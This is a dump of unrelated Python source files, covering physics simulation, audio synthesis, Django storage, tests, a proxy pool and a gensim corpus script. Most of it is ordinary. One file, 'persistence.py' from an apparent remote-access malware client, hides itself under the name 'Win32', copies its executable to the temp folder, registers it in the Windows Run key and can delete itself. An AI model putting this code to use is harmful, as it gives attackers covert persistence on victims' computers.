response1RDM = DMETorbitals.Construct1RDM_forward( orbital_i, omegabis, eta, energiesRHF, solutionRHF, groundstate1RDM, numPairs )
if (toSolve=='B'):
response1RDM = DMETorbitals.Construct1RDM_backward( orbital_i, omegabis, eta, energiesRHF, solutionRHF, groundstate1RDM, numPairs )
response1RDMs.append( response1RDM )
HamDMETs = []
for orbital_i in range(0, numImpOrbs):
# The response1RDM was calculated based on a normalized wavefunction: make a weighted average
weighted1RDM_i = ( 1.0 - prefactResponseRDM ) * groundstate1RDM + prefactResponseRDM * response1RDMs[ orbital_i ]
# For each impurity site, there's a different set of DMET orbitals
dmetOrbs_i, NelecEnvironment_i, DiscOccupation_i = DMETorbitals.ConstructBathOrbitals( self.impurityOrbs, weighted1RDM_i, numBathOrbs )
NelecActiveSpaceGuess_i = int( round( Nelectrons - NelecEnvironment_i ) + 0.001 ) # Now it should be of integer type
if ( orbital_i == 0 ):
NelecActiveSpace = NelecActiveSpaceGuess_i
else:
assert( NelecActiveSpace == NelecActiveSpaceGuess_i )
print " DMET :: Response (impurity", orbital_i, ") : Number of electrons not in impurity or bath orbitals =", NelecEnvironment_i
print " DMET :: Response (impurity", orbital_i, ") : The sum of discarded occupations = sum( min( NOON, 2-NOON ) , pure environment orbitals ) =", DiscOccupation_i
HamDMET_i = DMETham.DMETham( self.Ham, HamAugment, dmetOrbs_i, self.impurityOrbs, numImpOrbs, numBathOrbs )
HamDMETs.append( HamDMET_i )
# Get the exact solution for each of the impurity orbitals
totalGFvalue = 0.0
averageGSenergyPerSite = 0.0
GS_1RDMs = []
RESP_1RDMs = []
for orbital_i in range(0, numImpOrbs):
GSenergyPerSite, GS_1RDM, GSenergyFCI, GSvectorFCI = SolveCorrelated.SolveGS( HamDMETs[ orbital_i ], NelecActiveSpace )
GFvalue, RESP_1RDM = SolveCorrelated.SolveResponse( HamDMETs[ orbital_i ], NelecActiveSpace, orbital_i, omegabis, eta, toSolve, GSenergyFCI, GSvectorFCI )
totalGFvalue += GFvalue
averageGSenergyPerSite += GSenergyPerSite
GS_1RDMs.append( GS_1RDM )
RESP_1RDMs.append( RESP_1RDM )
averageGSenergyPerSite = ( 1.0 * averageGSenergyPerSite ) / numImpOrbs
if ( iteration==1 ):
notSelfConsistentTotalGF = totalGFvalue
umat_new = MinimizeCostFunction.MinimizeResponse( umat_new, umat_old, GS_1RDMs, RESP_1RDMs, HamDMETs, NelecActiveSpace, omegabis, eta, toSolve, prefactResponseRDM )
normOfDiff = np.linalg.norm( umat_new - umat_old )
if ( numImpOrbs > 1 ) and (( normOfDiff < 1e-3 ) or ( startedDIIS )):
startedDIIS = True
error = umat_new - umat_old
error = np.reshape( error, error.shape[0]*error.shape[1] )
theDIIS.append( error, umat_new )
print " DMET :: The average ground-state energy per site =",averageGSenergyPerSite
print " DMET :: The Green's function value (correlated problem) =",totalGFvalue
print " DMET :: The 2-norm of u_new - u_old =",normOfDiff
print umat_new
print "DMET :: Convergence reached. Converged u-matrix:"
print umat_new
print "***************************************************"
return ( averageGSenergyPerSite, totalGFvalue, notSelfConsistentTotalGF )
| SebWouters/PyDMET | oldstuff/HubbardDMETshiwei.py | Python | gpl-2.0 | 12,673 |
# -*- encoding: utf-8 -*-
from supriya.tools.ugentools.MultiOutUGen import MultiOutUGen
class DecodeB2(MultiOutUGen):
r'''
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2
DecodeB2.ar()
'''
### CLASS VARIABLES ###
__documentation_section__ = None
__slots__ = ()
_ordered_input_names = (
'channel_count',
'w',
'x',
'y',
'orientation',
)
_valid_calculation_rates = None
### INITIALIZER ###
def __init__(
self,
calculation_rate=None,
channel_count=None,
orientation=0.5,
w=None,
x=None,
y=None,
):
MultiOutUGen.__init__(
self,
calculation_rate=calculation_rate,
channel_count=channel_count,
orientation=orientation,
w=w,
x=x,
y=y,
)
### PUBLIC METHODS ###
@classmethod
def ar(
cls,
channel_count=None,
orientation=0.5,
w=None,
x=None,
y=None,
):
r'''Constructs an audio-rate DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2
DecodeB2.ar()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.AUDIO
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
channel_count=channel_count,
orientation=orientation,
w=w,
x=x,
y=y,
)
return ugen
@classmethod
def kr(
cls,
channel_count=None,
orientation=0.5,
w=None,
x=None,
y=None,
):
r'''Constructs a control-rate DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.kr(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2
DecodeB2.kr()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.CONTROL
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
channel_count=channel_count,
orientation=orientation,
w=w,
x=x,
y=y,
)
return ugen
# def newFromDesc(): ...
### PUBLIC PROPERTIES ###
@property
def channel_count(self):
r'''Gets `channel_count` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.channel_count
Returns ugen input.
'''
index = self._ordered_input_names.index('channel_count')
return self._inputs[index]
@property
def orientation(self):
r'''Gets `orientation` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.orientation
0.5
Returns ugen input.
'''
index = self._ordered_input_names.index('orientation')
return self._inputs[index]
@property
def w(self):
r'''Gets `w` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.w
Returns ugen input.
'''
index = self._ordered_input_names.index('w')
return self._inputs[index]
@property
def x(self):
r'''Gets `x` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.x
Returns ugen input.
'''
index = self._ordered_input_names.index('x')
return self._inputs[index]
@property
def y(self):
r'''Gets `y` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.y
Returns ugen input.
'''
index = self._ordered_input_names.index('y')
return self._inputs[index] | andrewyoung1991/supriya | supriya/tools/pendingugentools/DecodeB2.py | Python | mit | 5,473 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""contrib module containing volatile or experimental code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Add projects here, they will show up under tf.contrib.
from tensorflow.contrib import bayesflow
from tensorflow.contrib import cloud
from tensorflow.contrib import cluster_resolver
from tensorflow.contrib import compiler
from tensorflow.contrib import copy_graph
from tensorflow.contrib import crf
from tensorflow.contrib import cudnn_rnn
from tensorflow.contrib import data
from tensorflow.contrib import deprecated
from tensorflow.contrib import distributions
from tensorflow.contrib import estimator
from tensorflow.contrib import factorization
from tensorflow.contrib import framework
from tensorflow.contrib import gan
from tensorflow.contrib import graph_editor
from tensorflow.contrib import grid_rnn
from tensorflow.contrib import image
from tensorflow.contrib import input_pipeline
from tensorflow.contrib import integrate
from tensorflow.contrib import keras
from tensorflow.contrib import kernel_methods
from tensorflow.contrib import labeled_tensor
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import legacy_seq2seq
from tensorflow.contrib import linalg
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import memory_stats
from tensorflow.contrib import metrics
from tensorflow.contrib import nccl
from tensorflow.contrib import nn
from tensorflow.contrib import opt
from tensorflow.contrib import predictor
from tensorflow.contrib import quantization
from tensorflow.contrib import reduce_slice_ops
from tensorflow.contrib import resampler
from tensorflow.contrib import rnn
from tensorflow.contrib import saved_model
from tensorflow.contrib import seq2seq
from tensorflow.contrib import signal
from tensorflow.contrib import slim
from tensorflow.contrib import solvers
from tensorflow.contrib import sparsemax
from tensorflow.contrib import staging
from tensorflow.contrib import stat_summarizer
from tensorflow.contrib import stateless
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import tensorboard
from tensorflow.contrib import testing
from tensorflow.contrib import tfprof
from tensorflow.contrib import timeseries
from tensorflow.contrib import tpu
from tensorflow.contrib import training
from tensorflow.contrib import util
from tensorflow.contrib.ndlstm import python as ndlstm
from tensorflow.contrib.remote_fused_graph import pylib as remote_fused_graph
from tensorflow.contrib.specs import python as specs
from tensorflow.python.util.lazy_loader import LazyLoader
ffmpeg = LazyLoader("ffmpeg",
globals(), "tensorflow.contrib.ffmpeg")
del LazyLoader
del absolute_import
del division
del print_function
| tornadozou/tensorflow | tensorflow/contrib/__init__.py | Python | apache-2.0 | 3,590 |
from tornado import web
from handlers.BaseHandler import BaseHandler, wrap_async_rpc, wrap_catch
from core import FM
class LogoutHandler(BaseHandler):
def data_received(self, chunk):
pass
@wrap_async_rpc
@wrap_catch
@web.authenticated
def post(self):
action = self.get_action(name=FM.Actions.LOGOUT)
response = action.run()
self.json(response)
self.finish()
| f-andrey/sprutio | app/handlers/actions/main/LogoutHandler.py | Python | gpl-3.0 | 424 |
import logging
import urllib2
import urlparse
from django.conf import settings
from django.core.files.storage import Storage
from django.core.files.base import ContentFile
from django.core.exceptions import ImproperlyConfigured
from django.utils.http import urlquote
from django.core.cache import cache
from storages.backends.s3boto import S3BotoStorage
from imagekit.cachefiles.backends import CachedFileBackend
from queued_storage.utils import import_attribute
logger = logging.getLogger(__name__)
class ReadOnlyHttpStorage(Storage):
""" Read-only file storage that downloads files over HTTP.
:param prefix: URL prefix. Paths are appended to the prefix to get the
full URL.
"""
def __init__(self, prefix=None):
self.prefix = prefix
if not self.prefix:
self.prefix = settings.HTTP_STORAGE_URL
if not self.prefix or not self.prefix.startswith('http://'):
raise ImproperlyConfigured(
"ReadOnlyHttpStorage expects a HTTP URL, not '%s'" % self.prefix)
if not self.prefix.endswith("/"):
self.prefix = self.prefix + "/"
def listdir(self, name):
raise NotImplementedError()
def size(self, name):
raise NotImplementedError()
def exists(self, name):
if name:
url = self.url(name)
try:
urllib2.urlopen(url)
return True # URL Exist
except ValueError:
return False # URL not well formatted
except urllib2.URLError:
return False # URL don't seem to be alive
else:
return False
def url(self, name):
if name:
return urlparse.urljoin(self.prefix, urlquote(name))
else:
return ""
def _open(self, name, mode='rb'):
if 'w' in mode:
raise IOError("Cannot write to read-only http storage")
url = self.url(name)
file_content = urllib2.urlopen(url).read()
return ContentFile(file_content)
def delete(self, name):
raise IOError("Cannot write to read-only http storage")
def save(self, name, content):
raise IOError("Cannot write to read-only http storage")
def _save(self, name, content):
raise IOError("Cannot write to read-only http storage")
class OpenSurfacesStorage(Storage):
"""
Special filesystem for OpenSurfaces that serves files locally, downloading
remote data as needed from the public OpenSurfaces S3 repository. Since we
pay for bandwidth, we would appreciate if you did not try and replace this
with some system that no longer cached downloads locally.
:param local: optionally, specify a different local storage. Use ``None``
to use ``settings.OPENSURFACES_LOCAL_STORAGE`` (default: filesystem
storage that saves in ``media/``). **Note:** we assume that checking
``exists()`` on the local storage is fast. If this is not the case
(e.g. you are using S3 as the local filesystem), then you should extend
this class to cache info about which files exist.
:param readonly: if ``True``, do not allow writes.
:param cache_prefix: prefix for cache, to avoid clashes with other systems
that use the cache.
:param cache_timeout: timeout for cache. If a download takes longer than this,
it will be restarted.
"""
def __init__(self, local=None, readonly=False, cache_prefix=None,
cache_timeout=300):
self.local = local
self.readonly = readonly
self.cache_prefix = cache_prefix
self.cache_timeout = cache_timeout
if not self.cache_prefix:
self.cache_prefix = 'OpenSurfacesStorage'
if not self.local:
self.local = import_attribute(settings.OPENSURFACES_LOCAL_STORAGE)()
self.remote = ReadOnlyHttpStorage(prefix=settings.OPENSURFACES_REMOTE_STORAGE_URL)
def get_cache_key(self, name):
return '%s:%s' % (self.cache_prefix, name)
def ensure_local(self, name, async=False):
"""
Ensure that the file has been transferred to our local filesystem.
"""
if async:
# use a cache to avoid double downloading. Storing "True' in the
# cache indicates that a remote transfer has been queued.
cache_key = self.get_cache_key(name)
if not cache.get(cache_key):
cache.set(cache_key, True, self.cache_timeout)
from common.tasks import opensurfaces_storage_transfer
opensurfaces_storage_transfer.delay(name)
else:
if not self.local.exists(name) and self.remote.exists(name):
#logger.debug("Transferring '%s' to local storage" % name)
self.local.save(name, self.remote.open(name))
def listdir(self, name):
raise NotImplementedError()
def exists(self, name):
return self.local.exists(name) or self.remote.exists(name)
def size(self, name):
self.ensure_local(name)
return self.local.size(name)
def delete(self, name):
""" We cannot delete since a missing file is indistinguishable from
not-yet-downloading. """
raise IOError("Cannot delete from read-only http storage")
def url(self, name):
if self.local.exists(name):
return self.local.url(name)
else:
self.ensure_local(name, async=True)
return self.remote.url(name)
def _open(self, name, mode='rb'):
if 'w' in mode and self.readonly:
raise IOError("Cannot write to read-only http storage")
self.ensure_local(name)
return self.local.open(name, mode)
def _save(self, name, content):
if self.readonly:
raise IOError("Cannot write to read-only http storage")
else:
return self.local.save(name, content)
class ReducedRedundancyS3BotoStorage(S3BotoStorage):
"""
Amazon S3 storage with reduced redundancy
"""
def __init__(self, *args, **kwargs):
super(ReducedRedundancyS3BotoStorage, self).__init__(
reduced_redundancy=True, *args, **kwargs)
class ReadOnlyS3BotoStorage(S3BotoStorage):
"""
Amazon S3 storage with write disabled
"""
def delete(self, name):
logger.info("Prevented file delete: %s" % name)
def save(self, name, content):
logger.info("Prevented file save: %s" % name)
def _save(self, name, content):
logger.info("Prevented file save: %s" % name)
class ImageKitFileBackend(CachedFileBackend):
"""
This fixes problems with the default ImageKit backend.
The default ImageKit backend is doing something weird with file_exists.
It returns False when the file exists. It also seems to have some race conditions.
"""
def file_exists(self, file):
key = self.get_key(file)
exists = self.cache.get(key)
if exists is None:
exists = not file.closed or file.storage.exists(file.name)
self.cache.set(key, exists, 2592000)
return exists
def ensure_exists(self, file):
if not self.file_exists(file):
self.create(file)
def create(self, file):
key = self.get_key(file)
key_lock = key + '_lock'
if self.cache.add(key_lock, True, 300):
try:
file.generate(force=True)
self.cache.set(key, True, 2592000)
finally:
self.cache.delete(key_lock)
else:
logger.debug('Thumbnail creation already started')
| seanbell/opensurfaces | server/common/backends.py | Python | mit | 7,686 |
# coding=utf-8
# Copyright 2022 The ML Fairness Gym Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for multinomial_spaces.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from spaces import multinomial
import numpy as np
from six.moves import range
class MultinomialTest(absltest.TestCase):
def setUp(self):
self.n = 15 # number of trials
self.k = 6 # number of categories
self.multinomial_space = multinomial.Multinomial(self.k, self.n)
self.multinomial_space.seed(0)
super(MultinomialTest, self).setUp()
def test_sample_sum(self):
n_trials = 100
samples = [self.multinomial_space.sample() for _ in range(n_trials)]
sums_to_n = [np.sum(sample) == self.n for sample in samples]
self.assertTrue(np.all(sums_to_n))
def test_sample_distribution(self):
n_trials = 100
samples = [self.multinomial_space.sample() for _ in range(n_trials)]
# check roughly uniform distribution by checking means for each category
# are within 3*std dev of the expected mean
expected_mean = float(self.n) / self.k
means = np.mean(samples, axis=0)
std = np.std(means)
near_mean = np.asarray(
[np.abs(mean - expected_mean) < 3.0 * std for mean in means])
self.assertTrue(np.all(near_mean))
def test_contains_correct_n_in_vector(self):
# check a vector is contained even if it has n as one of its values.
n = 1 # number of trials
k = 2 # number of categories
multinomial_space = multinomial.Multinomial(k, n)
is_contained_vector = np.asarray([1, 0], dtype=np.uint32)
self.assertTrue(multinomial_space.contains(is_contained_vector))
def test_contains_correct(self):
is_contained_vector = np.asarray([2, 3, 2, 3, 3, 2], dtype=np.uint32)
self.assertTrue(self.multinomial_space.contains(is_contained_vector))
def test_contains_incorrect_length(self):
# check vector with incorrect length is not contained
not_contained_vector = np.asarray([3, 3, 3, 3, 3], dtype=np.uint32)
self.assertFalse(self.multinomial_space.contains(not_contained_vector))
def test_contains_incorrect_sum(self):
# check vector with incorrect sum is not contained
not_contained_vector = np.asarray([3, 3, 3, 3, 3, 3], dtype=np.uint32)
self.assertFalse(self.multinomial_space.contains(not_contained_vector))
def test_contains_incorrect_dtype(self):
# check vector with wrong dtype is not contained
not_contained_vector = np.asarray([2.0, 3.0, 2.0, 3.0, 3.5, 1.5])
self.assertFalse(self.multinomial_space.contains(not_contained_vector))
def test_contains_samples(self):
n_trials = 100
samples = [self.multinomial_space.sample() for _ in range(n_trials)]
contains_samples = [
self.multinomial_space.contains(sample) for sample in samples
]
self.assertTrue(np.all(contains_samples))
if __name__ == '__main__':
absltest.main()
| google/ml-fairness-gym | spaces/multinomial_test.py | Python | apache-2.0 | 3,523 |
import math
def f(n):
solutions = []
for a in xrange(1, n / 2):
aa = a**2
for b in xrange(a, n / 2):
bb = b**2
sqrt = math.sqrt(aa ++ bb)
if a + b + sqrt == n and sqrt == int(sqrt):
solutions.append([a, b, int(sqrt)])
return len(solutions)
count = [ f(i) for i in range(1, 1001) ]
print count.index(max(count)) + 1
| ericdahl/project-euler | python/p039.py | Python | bsd-3-clause | 412 |
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize as opt
# Definirajmo funkcijo, ki jo fitamo
f = lambda x, A, B: A * np.exp(B * x)
data = np.loadtxt('../data/boltz.dat', skiprows=1, delimiter=',')
# Klicemo curve_fit, kjer je
# - sigma: seznam napak y koordinate
# - p0: zacetni priblizki parametrov (kot so v zaporedju v def. funkcije)
popt, cov = opt.curve_fit(
f, data[:, 0], data[:, 1], sigma=data[:, 3], p0=[1, 1e-10])
# Napake so koreni diagonalnih elementov kovariancne matrike
perr = np.sqrt(np.diag(cov))
print(popt)
print(perr)
plt.errorbar(data[:, 0], data[:, 1], xerr=data[:, 2], yerr=data[:, 3])
plt.plot(data[:, 0], f(data[:, 0], popt[0], popt[1]))
plt.show()
| ntadej/racorodja | python/fit.py | Python | mit | 711 |
"""Tests for distutils.command.register."""
# -*- encoding: utf8 -*-
import sys
import os
import unittest
import getpass
import urllib2
import warnings
from test.test_support import check_warnings, run_unittest
from distutils.command import register as register_module
from distutils.command.register import register
from distutils.core import Distribution
from distutils.errors import DistutilsSetupError
from distutils.tests import support
from distutils.tests.test_config import PYPIRC, PyPIRCCommandTestCase
PYPIRC_NOPASSWORD = """\
[distutils]
index-servers =
server1
[server1]
username:me
"""
WANTED_PYPIRC = """\
[distutils]
index-servers =
pypi
[pypi]
username:tarek
password:password
"""
class RawInputs(object):
"""Fakes user inputs."""
def __init__(self, *answers):
self.answers = answers
self.index = 0
def __call__(self, prompt=''):
try:
return self.answers[self.index]
finally:
self.index += 1
class FakeOpener(object):
"""Fakes a PyPI server"""
def __init__(self):
self.reqs = []
def __call__(self, *args):
return self
def open(self, req):
self.reqs.append(req)
return self
def read(self):
return 'xxx'
class RegisterTestCase(PyPIRCCommandTestCase):
def setUp(self):
super(RegisterTestCase, self).setUp()
# patching the password prompt
self._old_getpass = getpass.getpass
def _getpass(prompt):
return 'password'
getpass.getpass = _getpass
self.old_opener = urllib2.build_opener
self.conn = urllib2.build_opener = FakeOpener()
def tearDown(self):
getpass.getpass = self._old_getpass
urllib2.build_opener = self.old_opener
super(RegisterTestCase, self).tearDown()
def _get_cmd(self, metadata=None):
if metadata is None:
metadata = {'url': 'xxx', 'author': 'xxx',
'author_email': 'xxx',
'name': 'xxx', 'version': 'xxx'}
pkg_info, dist = self.create_dist(**metadata)
return register(dist)
def test_create_pypirc(self):
# this test makes sure a .pypirc file
# is created when requested.
# let's create a register instance
cmd = self._get_cmd()
# we shouldn't have a .pypirc file yet
self.assertTrue(not os.path.exists(self.rc))
# patching raw_input and getpass.getpass
# so register gets happy
#
# Here's what we are faking :
# use your existing login (choice 1.)
# Username : 'tarek'
# Password : 'password'
# Save your login (y/N)? : 'y'
inputs = RawInputs('1', 'tarek', 'y')
register_module.raw_input = inputs.__call__
# let's run the command
try:
cmd.run()
finally:
del register_module.raw_input
# we should have a brand new .pypirc file
self.assertTrue(os.path.exists(self.rc))
# with the content similar to WANTED_PYPIRC
f = open(self.rc)
try:
content = f.read()
self.assertEqual(content, WANTED_PYPIRC)
finally:
f.close()
# now let's make sure the .pypirc file generated
# really works : we shouldn't be asked anything
# if we run the command again
def _no_way(prompt=''):
raise AssertionError(prompt)
register_module.raw_input = _no_way
cmd.show_response = 1
cmd.run()
# let's see what the server received : we should
# have 2 similar requests
self.assertEqual(len(self.conn.reqs), 2)
req1 = dict(self.conn.reqs[0].headers)
req2 = dict(self.conn.reqs[1].headers)
self.assertEqual(req2['Content-length'], req1['Content-length'])
self.assertTrue('xxx' in self.conn.reqs[1].data)
def test_password_not_in_file(self):
self.write_file(self.rc, PYPIRC_NOPASSWORD)
cmd = self._get_cmd()
cmd._set_config()
cmd.finalize_options()
cmd.send_metadata()
# dist.password should be set
# therefore used afterwards by other commands
self.assertEqual(cmd.distribution.password, 'password')
def test_registering(self):
# this test runs choice 2
cmd = self._get_cmd()
inputs = RawInputs('2', 'tarek', 'tarek@ziade.org')
register_module.raw_input = inputs.__call__
try:
# let's run the command
cmd.run()
finally:
del register_module.raw_input
# we should have send a request
self.assertEqual(len(self.conn.reqs), 1)
req = self.conn.reqs[0]
headers = dict(req.headers)
self.assertEqual(headers['Content-length'], '608')
self.assertTrue('tarek' in req.data)
def test_password_reset(self):
# this test runs choice 3
cmd = self._get_cmd()
inputs = RawInputs('3', 'tarek@ziade.org')
register_module.raw_input = inputs.__call__
try:
# let's run the command
cmd.run()
finally:
del register_module.raw_input
# we should have send a request
self.assertEqual(len(self.conn.reqs), 1)
req = self.conn.reqs[0]
headers = dict(req.headers)
self.assertEqual(headers['Content-length'], '290')
self.assertTrue('tarek' in req.data)
def test_strict(self):
# testing the script option
# when on, the register command stops if
# the metadata is incomplete or if
# long_description is not reSt compliant
# empty metadata
cmd = self._get_cmd({})
cmd.ensure_finalized()
cmd.strict = 1
self.assertRaises(DistutilsSetupError, cmd.run)
# we don't test the reSt feature if docutils
# is not installed
try:
import docutils
except ImportError:
return
# metadata are OK but long_description is broken
metadata = {'url': 'xxx', 'author': 'xxx',
'author_email': u'éxéxé',
'name': 'xxx', 'version': 'xxx',
'long_description': 'title\n==\n\ntext'}
cmd = self._get_cmd(metadata)
cmd.ensure_finalized()
cmd.strict = 1
self.assertRaises(DistutilsSetupError, cmd.run)
# now something that works
metadata['long_description'] = 'title\n=====\n\ntext'
cmd = self._get_cmd(metadata)
cmd.ensure_finalized()
cmd.strict = 1
inputs = RawInputs('1', 'tarek', 'y')
register_module.raw_input = inputs.__call__
# let's run the command
try:
cmd.run()
finally:
del register_module.raw_input
# strict is not by default
cmd = self._get_cmd()
cmd.ensure_finalized()
inputs = RawInputs('1', 'tarek', 'y')
register_module.raw_input = inputs.__call__
# let's run the command
try:
cmd.run()
finally:
del register_module.raw_input
def test_check_metadata_deprecated(self):
# makes sure make_metadata is deprecated
cmd = self._get_cmd()
with check_warnings() as w:
warnings.simplefilter("always")
cmd.check_metadata()
self.assertEqual(len(w.warnings), 1)
def test_suite():
return unittest.makeSuite(RegisterTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
| ktan2020/legacy-automation | win/Lib/distutils/tests/test_register.py | Python | mit | 7,870 |
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: ProxyHandler.py
Description :
Author : JHao
date: 2016/12/3
-------------------------------------------------
Change Activity:
2016/12/03:
2020/05/26: 区分http和https
-------------------------------------------------
"""
__author__ = 'JHao'
from helper.proxy import Proxy
from db.dbClient import DbClient
from handler.configHandler import ConfigHandler
class ProxyHandler(object):
""" Proxy CRUD operator"""
def __init__(self):
self.conf = ConfigHandler()
self.db = DbClient(self.conf.dbConn)
self.db.changeTable(self.conf.tableName)
def get(self, https=False):
"""
return a proxy
Args:
https: True/False
Returns:
"""
proxy = self.db.get(https)
return Proxy.createFromJson(proxy) if proxy else None
def pop(self, https):
"""
return and delete a useful proxy
:return:
"""
proxy = self.db.pop(https)
if proxy:
return Proxy.createFromJson(proxy)
return None
def put(self, proxy):
"""
put proxy into use proxy
:return:
"""
self.db.put(proxy)
def delete(self, proxy):
"""
delete useful proxy
:param proxy:
:return:
"""
return self.db.delete(proxy.proxy)
def getAll(self, https=False):
"""
get all proxy from pool as Proxy list
:return:
"""
proxies = self.db.getAll(https)
return [Proxy.createFromJson(_) for _ in proxies]
def exists(self, proxy):
"""
check proxy exists
:param proxy:
:return:
"""
return self.db.exists(proxy.proxy)
def getCount(self):
"""
return raw_proxy and use_proxy count
:return:
"""
total_use_proxy = self.db.getCount()
return {'count': total_use_proxy}
| jhao104/proxy_pool | handler/proxyHandler.py | Python | mit | 2,079 |
import os
import sys
import subprocess
import shutil
import requests
import utils
#try to hide it
SERVICE_NAME = "Win32"
if getattr(sys, 'frozen', False):
EXECUTABLE_PATH = sys.executable
elif __file__:
EXECUTABLE_PATH = __file__
else:
EXECUTABLE_PATH = ''
EXECUTABLE_NAME = os.path.basename(EXECUTABLE_PATH)
def install():
if not is_installed():
stdin, stdout, stderr = os.popen3("reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v %s /t REG_SZ /d %s" % (SERVICE_NAME, os.environ["TEMP"] + "\\" + EXECUTABLE_NAME))
shutil.copyfile(EXECUTABLE_PATH, os.environ["TEMP"] + "/" + EXECUTABLE_NAME)
def clean():
subprocess.Popen("reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v %s" % SERVICE_NAME,
shell=True)
subprocess.Popen(
"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v %s /t REG_SZ /d %s" % (SERVICE_NAME, "\"cmd.exe /c del %USERPROFILE%\\" + EXECUTABLE_NAME + "\""),
shell=True)
def is_installed():
output = os.popen(
"reg query HKCU\Software\Microsoft\Windows\Currentversion\Run /f %s" % SERVICE_NAME)
if SERVICE_NAME in output.read():
return True
else:
return False
def run(action):
try:
if action == "install":
install()
utils.send_output("Persistence installed")
elif action == "remove":
clean()
utils.send_output("Persistence removed")
elif action == "status":
if is_installed():
utils.send_output("Persistence is ON")
else:
utils.send_output("Persistence is OFF")
except Exception, exc:
utils.send_output(exc)
def help():
help_text = """
Usage: persistence install|remove|status
Manages persistence.
"""
return help_text
| EzLucky/Wares | client/modules/persistence.py | Python | mit | 1,886 |
# -*- coding: utf-8 -*-
from pymongo import MongoClient
import numpy as np
import gensim, cython, codecs, os, logging, re, json, time
from gensim import models, corpora
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
# from nltk.corpus import stopword
# from nltk.stem import *
# from nltk.stem import WordNetLemmatizer
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
# Variables
hostname = "localhost"
port = 27017
database_name = "twitter-data"
collection_name = "ns"
#
DATA_DIR = '/home/nipg1/Documents/summer_project/data/'+ collection_name + '/models'
LOG_DIR = '/home/nipg1/Documents/summer_project/data/'+ collection_name + '/embedding_logs'
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
if not os.path.exists(LOG_DIR):
os.makedirs(LOG_DIR)
sep = ' ' # delimiter/separator
stopwords = ['the', 'be', 'and', 'of', 'a', 'an', 'in', 'to', 'or', 'have', 'has',
'it', 'i', 'that', 'for', 'you', 'he', 'with', 'on', 'do','say',
'this', 'they', 'at', 'but', 'we', 'rt']
alphanumeric = re.compile('[\W]+', re.UNICODE)
stopword_patterns = ['www\.[^ ]+\.[^ ]+', 'https?:\/\/[^ ]+', '([@#])([a-z\d_]+)', '^\d$'] #links, mentions, hashtags, numbers
word_endings = u'.,!?:…"\'/-\n\t'
cores = 4
word_dimension = 200
stopword_pattern = re.compile("|".join(["^" + stopword + "$" for stopword in stopwords] + stopword_patterns))
# standard deviation of vector
def normalize(X, axis=None):
if(sum(X)==0):
return X
return ((X - np.mean(X, axis=axis, keepdims=True)) / np.std(X, axis=axis, keepdims=True))
def word_processor(word):
word = word.rstrip(word_endings).lower()
word = re.sub(stopword_pattern, '', word)
word = word.rstrip(word_endings)
return word
class MyCorpus(object):
def __init__(self, key, sep):
# self.search_filter = json.loads(search_filter)
self.sep = sep
self.key = key
def __iter__(self):
for tweet in collection.find({"text": {"$exists": "true"}, lang:'en'}, {'text': 1}).limit(10000):
yield filter(None, [ word_processor(word.encode('ascii', 'ignore').decode('ascii').translate(None, '()!@#?$.:1234567890%+*/+[]=,;-_"\'\\').lower()) for word in tweet[self.key].split(self.sep)])
class MyCorpus2(object):
